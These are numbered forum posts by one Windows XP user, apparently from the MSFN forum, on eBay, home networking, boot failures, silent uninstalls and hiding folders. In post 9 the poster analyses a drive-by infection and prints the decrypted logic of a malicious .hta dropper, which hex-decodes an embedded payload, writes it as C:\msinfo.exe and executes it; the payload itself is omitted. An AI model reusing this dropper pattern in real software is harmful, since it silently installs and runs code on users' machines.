  1. my dads been using ebay for about 3 years now, bought lots of stuff off of Ebay and got all the stuff that he ordered without any trouble. there are SOME stuff out there that is BS but those are the things that are like 20 million dollars... such as an F-15 Eagle Military Jet.... or Doom3 before it hit the shelves. but who would bid on something thats 20 million?! also.. people like too joke around and put things like.. a Used condom... a half eaten donut.. a half eaten penut butter and jelly sandwhich... yea.. lol best suggestion is use another bank account. one just for online purchases.. if anything goes bad the person would get like 500 dollars insted of 200K dollars.. or whatever..
  2. Updated Link there ya go
  3. *edited* stupid internet crashed and hit submit again.. lol *sorry*
  4. lol nice pics *especially the one wherer the guy fell asleep at the keyboard... i've done that a couple times*

  8. ok nevermind.. i fixed it after removing the virus/trojan and deletin the files, i went into my registry and deleted everythign under: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings and now its all better
  9. well... decided too go for the gold lol, went back too the site got infected about 6 more times viewed the source of most of the pages.. it redirects A LOT! and they tried covering the data with a weak javascript encryption. then found a file in my temporary internet files.. called *randomname*.hta... this file too is encrypted but i decrypted it a bit... *some HTML crap* c0 = "*LOTS of random letters and numbers, guessing this is the "virus/downloader" itself*" h0 = "" i = 1 Do While i < Len(c0) h0 = h0 & chr(cint("&h" & mid(c0, i, 2))) i = i + 2 Loop set wsh = CreateObject("WScript.Shell") path = "C:\\" set fs = CreateObject("Scripting.FileSystemObject") set ts = fs.CreateTextFile(path + "msinfo.exe", true, false) ts.Write(h0) ts.Close() wsh.Run(path + "msinfo.exe") self.close() </script> *End HTML crap..* so.. i guess i'm gonna look for how too stop .hta extenstions from being executed....
  10. hmm......... none of my cookies, temporary files or history is being deleted.. when i right click internet explorer and hit delete.... also.. i found the website that caused this... i'm probably gonna install another copy of windows using VMware and visit... see what makes it "tick" lol
  11. went too a website earlier looking for a sound file "Quagmire from Family guy saying giddy giddy giddy" or whatever.. anyways.. came across one website and when i clicked it had some lesbian porn site............. then my AVG Antivirus came up and said 2 viruses were found. 1. C:\Windows\MSOPT.DLL (Downloader.Small.6.BA) 2. C:\Windows\System32\IEYY32.DLL (Downloader.agent.2.BN) I got Spyware Blaster and Spyware Guard installed. it came up about 5 times saying trying too change my search page, my homepage, and a bunch of others. I removed the 2 files and when i looked in My C:\ i saw a file named "msinfo.exe" checked my process explorer (syinternals freeware) not the ctrl+alt+delete task manager.. and msinfo.exe was running with an open port...... so i forcefully shutdown that everything else looked fin. so i looked up msinfo.exe and it came back as part of CoolWebSearch... msinfo.exe Process Information well... deleted msinfo.exe and ran hijackthis came back with some sites in the trusted sites list. deleted them and checked the list manually. there was 1 that was just an IP address. so deleted that one too. but now everywebsite i come too has the "Trusted Sites" thing down in the lower right corner... even sites i've never visited before have that.....
  12. if u pay 15$,it may work better. na, there are many smart people here on MSFN, all ya gotta do is follow their instructions correctly and you'll be on your way put that 15 bucks back in your pocket and just post any problems here and you'll have 15 bucks too spend on whatever you want
  13. this may help.. but i've heard its a real pain in the *rear* too do. most people just format their computers and reinstall windows xp... without SP2... http://support.microsoft.com/default.aspx?...=windowsxpsp2kb one guy on a diffrent forum even said it took him 3 days too completly uninstall SP2. as for the £40... shouldn't be too hard too set that up if its just 2 computers. although you may have certain settings that may be needed by your ISP or if you have something strange like token ring or something else besides normal ethernet. Usually this is all you need too do to network 2 computers.. 1. make sure too set the IP addresses of both computers too almost the same. example: 192.168.1.10 *computer 1* 192.168.1.11 *computer 2* (I used 10 and 11 cause most routers/modems use 192.168.1.1...) 2. Make sure both computers are on the same workgroup. thats usually all there is to do on windows XP computers. good luck.
  14. only time i EVER use a floppy is for a startup disk. thats about it. or when i was going too school too move my reports or whatever on to the floppy... but now most computers at school are running macintosh....
  15. hopefully fixed... completly removed everything out of my computer.. EVERYTHING. lol... and slowly put it all back together. found that when i had 2 hard drives plugged in it wouldn't work.. but when i had 1 it would work. i also noticed that when it worked earlier today that i only had 1 hard drive in "my computer/explorer" so it wasn't seeing the other hard drive. i quickly brought out my box of cables and junk and happened too have a spare brand new 80 pin cable. so plugged that in and came right back too life. so.. hopefully that fixed it.
  16. well... when you can get an emachine for under 500 bucks thats a 2.0ghz *this was about a year and a half old computer* its not too bad... btw.. ITS FREAKIN DOING IT AGAIN!!! BAH!!! and the solution before didn't help at all....
  17. welll geezus christ..... i just found the solution.... aparently there was too much power or something sitting in the computer.. i unplugged the computer from the wall and it started too boot for about 2 seconds. then i plugged it back in and it worked... so yea.. stupid computers.. NEVERMIND! stupid computer...
  18. yea yea yea, i know i probably put this in the wrong topic lol. but the computers running windows XP... so well, my compter has done this before but all i did was waited like an hour came back and it worked.. but its been 4 hours now...... after i press the power button on my computer there is an eMachines screen taht comes up. but won't go past there... Also the hard drive light never goes out. i tried unpluggin the hard rive and using another one.. but that didn't work either... I've tried resetting the bios by removing the battery and moving the jumper for the reset bios. but still having this problem. I can't even access the Bios by pressing delete, F1 or F2. anyone know how too correct this? also.. i don't do any overclockin... Main Computer: eMachines T2341 Mainboard: EliteGroup L7VMM2
  19. what about silently? is there a command like /silent for the uninstallers?
  20. well... this may be in the wrong section.. but this was my best guess.. anyone know how or if you can make a batch file too uninstall things most preferably silently... i wanna run my Restore CD's that came with my computer cause it takes about 10 minutes insted of an hour. and then run another CD that would run the installation of my programs (adware, spybot, winamp 5, etc...) and see if it can delete the crap that the restore CD's put on my computer (compuserv, AOL, Winamp 2.x, etc...) I would just copy the files from the restore CD, but they're all in a GHO file *norton ghost* also.. if push comes too shove, i'll just make the batch file delete the folders *deltree* of compuserve and crap along with deleting them out of the registry and any system folders. hopefully without screwin up my computer at the same time..
  21. I wish i could provide you with some sort of CD Copy protection..but i can't... but i can see where you would want this.. just think the un encrpyted CD-Key is just sitting there in the winnt.sif file anyone can read that. Plus you wouldn't want someone to copy your CD and distribute it over the net or to more friends as this could raise a red flag at microsoft if they go to the windows update. so best bet is just don't let any one have it. If you have too run the cd in a clients computer *takes a good hour* i suggest you make sure too keep track of who has the CD on what date and what time. and also try too time it. come back in an hour see where it is. if its done take the cd.. if its at like 5 minutes wait till its done and take the cd.
  22. @uNxHiTMaN I'll try that after i post this... *EDIT* hmm... kinda difficult too use in my opinion. @Vel Straty & Alanoll I got a whole drive i wanna hide from the users and i don't wanna have too remake shortcuts if i do move them too my profiles folder or what not..
  23. well... my PERSONAL computer just became the family computer.. its still in my room but i got information i don't want anyone else reading. *or pictures* well.. i looked at one program many years ago called folderguard.. but its pointless as a message comes up saying "there is a hidden folder at c:\hidden do you wish too make this folder visible" if you have the unregistered version... so my question is... does anyone know of a good FREEWARE program that can hide folders/drives in windows XP.. Thanks
  24. oh never though of that lol
